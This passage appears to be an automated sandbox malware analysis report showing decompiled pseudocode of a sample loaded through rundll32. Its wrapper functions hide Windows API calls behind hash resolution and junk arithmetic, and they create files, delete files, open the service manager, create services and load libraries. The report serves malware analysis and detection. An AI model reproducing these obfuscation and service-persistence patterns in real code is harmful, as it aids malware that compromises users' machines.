C-Code - Quality: 31%

			E001BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001bb569
0x001bb56a
0x001bb56d
0x001bb572
0x001bb574
0x001bb577
0x001bb57a
0x001bb57d
0x001bb580
0x001bb583
0x001bb586
0x001bb587
0x001bb58a
0x001bb58d
0x001bb590
0x001bb593
0x001bb594
0x001bb595
0x001bb59a
0x001bb5a4
0x001bb5b8
0x001bb5c0
0x001bb5c4
0x001bb5cb
0x001bb5d2
0x001bb5d9
0x001bb5e6
0x001bb5fd
0x001bb604

APIs

CreateFileW.KERNELBASE(001C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001C0668,?,?,?,?), ref: 001BB5FD

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6725fcf7fbb50ce5bd6aab8df551017077bf3fc56c41ae3334ad3b925e957fcd
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: F611BF72801248BBDF16DF95DD06CEE7FBAEF99314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001c9821
0x001c9822
0x001c9825
0x001c9828
0x001c982a
0x001c982c
0x001c982f
0x001c9832
0x001c9835
0x001c9836
0x001c9837
0x001c983c
0x001c9855
0x001c9858
0x001c985f
0x001c9866
0x001c986d
0x001c9874
0x001c987b
0x001c988e
0x001c989b
0x001c98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001B87F2,0000CAAE,0000510C,AD82F196), ref: 001C989B

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 91343e7afc06622a3fa6959c9da9b115f1d129389da1fba3ab650883ec2038cc
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: CC018872801208FBDB08EFD5D846CDFBF79EF95310F10818CF908A6220E6719A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001c7bf7
0x001c7bf8
0x001c7bfa
0x001c7bfd
0x001c7bff
0x001c7c02
0x001c7c06
0x001c7c07
0x001c7c0f
0x001c7c1d
0x001c7c25
0x001c7c2d
0x001c7c31
0x001c7c38
0x001c7c3f
0x001c7c46
0x001c7c4a
0x001c7c5e
0x001c7c67
0x001c7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001C7C67

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 6caadd193399ce78e7f5a8cc4e138f1ea36a306b792c23a7f040c1bb7b532d4c
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: B7014BB190120CFFEB09DFA4C84A9DEBBB9EF54314F208198F405A7240EBB19F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001bf662
0x001bf663
0x001bf665
0x001bf668
0x001bf66a
0x001bf66d
0x001bf670
0x001bf673
0x001bf677
0x001bf678
0x001bf67d
0x001bf687
0x001bf693
0x001bf69a
0x001bf6a1
0x001bf6a5
0x001bf6a9
0x001bf6b0
0x001bf6c9
0x001bf6d8
0x001bf6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001BF6D8

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0aa635a33969d0bb15146abc9de0b9e751b2c0cdb7da03f56719894e13192673
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 2901E5B6901208BBEF05AF94DC068DF7F75EB15324F148188F90462250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001B602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001bb6f3
0x001bb6f8
0x001bb702
0x001bb70b
0x001bb712
0x001bb719
0x001bb720
0x001bb727
0x001bb72e
0x001bb747
0x001bb759
0x001bb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001BB759

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 92b3a87ebfcb90482349c4c08848fb740351d06fc1b64c4268234279f969f6d6
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 9E0128B6941308FBEB45DF94DD06E9E7BB5EB18704F108188FA09661A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001caa3f
0x001caa40
0x001caa41
0x001caa44
0x001caa47
0x001caa4b
0x001caa4c
0x001caa51
0x001caa5b
0x001caa64
0x001caa68
0x001caa6f
0x001caa76
0x001caa8d
0x001caa90
0x001caa9d
0x001caaa8
0x001caaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001CAAA8

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 033fe6d405475f3929599029d466b4aa154e068d6064d85cd0ac8b976b3bca9e
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 30F069B190020CFFDF08EF94DD4A99EBFB4EB54304F10808CF805A6250D3B69B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001b5fb5
0x001b5fb6
0x001b5fb7
0x001b5fbb
0x001b5fbc
0x001b5fc1
0x001b5fcb
0x001b5fd7
0x001b5fde
0x001b5fe5
0x001b5ffc
0x001b5fff
0x001b6006
0x001b600d
0x001b601a
0x001b6025
0x001b602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001B6025

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 33aca1f4dfae311a7e4b0805b1e5eafa30bce6370b8de9c4ff09beaaa06defa9
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 6AF03CB0811208FFDB08DFA0E94689EBFB8EB50300F20819CE409A7260E7719F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2748 Parent PID: 2792 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.4%
Total number of Nodes:	993
Total number of Limit Nodes:	13

Executed Functions

Function 002454FE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E002454FE(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a20, intOrPtr _a24, int _a28, int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, short* _a56, short* _a60, int _a64, void* _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a88) {
				unsigned int _v8;
				signed int _v12;
				short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t46;
				void* _t52;
				int _t58;

				_push(_a88);
				_t58 = __edx;
				_push(0);
				_push(_a80);
				_push(_a76);
				_push(_a72);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t46);
				_v24 = 0x606c86;
				_v20 = 0x615b40;
				_v16 = 0;
				_v8 = 0x9d8c;
				_v8 = _v8 << 0xc;
				_v8 = _v8 * 0x25;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0d8a708b;
				_v12 = 0x11d8;
				_v12 = _v12 + 0xffff43f8;
				_v12 = _v12 + 0x7eac;
				_v12 = _v12 ^ 0xffffec2f;
				E002507A9(0xf9120da5, 0x2c3ac9a2, __ecx, __ecx, 0x8c);
				_t52 = CreateServiceW(_a72, _a56, _a20, _a64, _t58, _a32, _a28, _a60, 0, 0, 0, 0, 0); // executed
				return _t52;
			}

0x00245506
0x0024550b
0x0024550d
0x0024550e
0x00245511
0x00245514
0x00245517
0x00245518
0x0024551b
0x0024551e
0x00245521
0x00245524
0x00245525
0x00245528
0x0024552b
0x0024552e
0x00245531
0x00245534
0x00245537
0x0024553a
0x0024553b
0x0024553c
0x0024553f
0x00245542
0x00245543
0x00245544
0x00245549
0x00245553
0x0024555f
0x00245562
0x00245569
0x0024557d
0x00245580
0x00245584
0x0024558b
0x00245592
0x00245599
0x002455a0
0x002455ad
0x002455d0
0x002455d7

APIs

CreateServiceW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 002455D0

Strings

@[a, xrefs: 00245553

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateService
String ID: @[a
API String ID: 1592570254-3961618819
Opcode ID: 00c8751bc4faf3ebc3fe7773c89129ce465c74e10851870b8312b1a4c97aa27c
Instruction ID: 80b5f9b25460a905ac0c0b7a75ff1598b766cf1f05316bd79ab55d84d3b47724
Opcode Fuzzy Hash: 00c8751bc4faf3ebc3fe7773c89129ce465c74e10851870b8312b1a4c97aa27c
Instruction Fuzzy Hash: FA21AC72801248FBDF1A9F95CD09CDEBF76EF88314F108148FA5466160C3729A65EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00242959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00242959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0024602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002507A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0024295f
0x00242964
0x00242967
0x0024296a
0x0024296d
0x0024296e
0x0024296f
0x00242977
0x00242985
0x0024298a
0x00242992
0x0024299a
0x002429a2
0x002429a9
0x002429b0
0x002429b7
0x002429bb
0x002429cf
0x002429dc
0x002429e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002429DC

Strings

<^, xrefs: 00242977

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 3e6d1b5a01cd0fdcda24aea55cf6fa34e580be4e139d8afb2a8803ff8af63732
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 8A016D72A00108BFEB18DF95DC4A8DFBFB6EF49310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0024C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0024602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002507A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0024c6e1
0x0024c6e6
0x0024c6f0
0x0024c6fc
0x0024c703
0x0024c706
0x0024c70d
0x0024c711
0x0024c715
0x0024c71c
0x0024c723
0x0024c72a
0x0024c731
0x0024c738
0x0024c751
0x0024c762
0x0024c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0024C762

Strings

/O, xrefs: 0024C6E6

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 3c7cf0de1f5ed7469e7890f97129af1cec401de26ed1d109ba8ab5eb06557b8d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: DD1133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00241000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00241000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0024602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002507A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00241006
0x00241009
0x0024100c
0x00241011
0x00241016
0x0024101d
0x00241026
0x0024102d
0x00241034
0x0024103b
0x00241047
0x0024104f
0x00241057
0x0024105e
0x00241065
0x0024106c
0x00241073
0x00241077
0x0024108b
0x00241096
0x0024109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00241096

Strings

[, xrefs: 0024103B

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 7a9518ee9f9445a9ea81d9c3fdb50e1bc1c45783eafac264d9cd089ecdcddc20
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 27015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00244859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00244859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002507A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0024485e
0x0024487a
0x0024487d
0x00244884
0x0024488b
0x00244892
0x0024489d
0x002448a0
0x002448ad
0x002448b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002448B7

Strings

[, xrefs: 0024488B

Memory Dump Source

Source File: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.2112711745.0000000000240000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2112780606.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: eea1a5535cbed8a1fb8469f8cc00cf66a99779d49ea18802af489eead00461e1
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 9CF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54

Uniqueness

Uniqueness Score: -1.00%

Function 00254F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00254F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
